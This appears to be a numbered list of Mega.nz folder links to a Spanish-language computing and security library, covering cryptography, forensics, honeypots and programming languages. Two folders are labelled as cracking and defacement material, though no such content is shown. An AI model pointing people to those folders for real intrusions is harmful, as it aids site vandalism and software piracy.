https://mega.nz/#F!WiAARCjD!lQ-TfZ_gmqZOgQiB6KTErg
34: Cracking by Aletinte
https://mega.nz/#F!XvJCCaZZ!QKPnq6IVyoTCQlsLMkG96w
35: Criptografía
https://mega.nz/#F!TzBAXKYL!aYqu54lnq3nC9BLr_v-vFg
36: Criptograf
https://mega.nz/#F!SjRi0ALB!Pb3IMC-A8_4JFYSJgeX7MA
37: Cursos
https://mega.nz/#F!P2wVBSpK!ein9iW50EeYzS-VprX8ugA
38: Deep Wed
https://mega.nz/#F!mrohiChS!Xj2ddirab5KI97DdHJoKWw
39: Deface
https://mega.nz/#F!D64TkQBB!T9Dz2fXtT_NLyCZjvrz9Yg
40: Deidel-Deidel
https://mega.nz/#F!T6gzzKBB!oZrJJv4hofsCAMzjoroNMg
41: DELPHI
https://mega.nz/#F!Hj5RSKqK!LvSCDl53lOMMVWRcIi_kEA
42: Desarrollo de software
https://mega.nz/#F!qr5XEARS!U8_kb_BGQh6CDGVK_JkG4g
43: Desarrollo de software By Aletinte
https://mega.nz/#F!iupHwYbC!On4nK0CRsNUxcdR429gBVA
44: Detecsion-coliciones
https://mega.nz/#F!LzwHVQ4S!t8us76oqb6JrC5ccp33mRg
45: Deteccion-honeynets
https://mega.nz/#F!fvwnyAyS!QX9CjhA7SPg4FNnD8mxPnQ
46: Dinero electrónico
https://mega.nz/#F!j2pzkaAD!I7fIzUujuDkq37h1Z9tgQQ
47: Diseño-Desarrollo honeypost
https://mega.nz/#F!angBEAwJ!7nxfB97uRSLJKj4P7CPD-Q
48: Electrónica
https://mega.nz/#F!zu5zlSxC!apjvUelJmt31YT-ReUhf7A
49: Ensamblador
https://mega.nz/#F!Om432CYJ!shvMiqhwxlXdH9kKyl6ohQ
50: Estudió
https://mega.nz/#F!P6gXxQhb!ipRwbOn5w03VllvqQtQXpA
51: Extras
https://mega.nz/#F!fmwzWYqJ!vgdXvph26vEYSbhqY73Xjw
52: Firewall
https://mega.nz/#F!6ugziSxR!QgtGwfZcbEwGnru0iYpOVA
53: Forense
https://mega.nz/#F!26oDASgK!NnKTJbaGEFcJ_B5AgcVWpA
54: Forense By Aletinte
https://mega.nz/#F!m7hF0YTZ!05HyuFw_7cDd9BzloamoHg
55: Fortran
https://mega.nz/#F!62gBnIoD!n5raX4xfGf_VmfSC9M_EZA
56: FORTRAN
https://mega.nz/#F!PixXxKjQ!B6TQ6lZchXwWSsgU_BHKUA
57: General
https://mega.nz/#F!yqo1wagQ!Ebr93EwmTLQxUsvl_xCm8g
57: General
https://mega.nz/#F!yqo1wagQ!Ebr93EwmTLQxUsvl_xCm8g
mega.nz
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now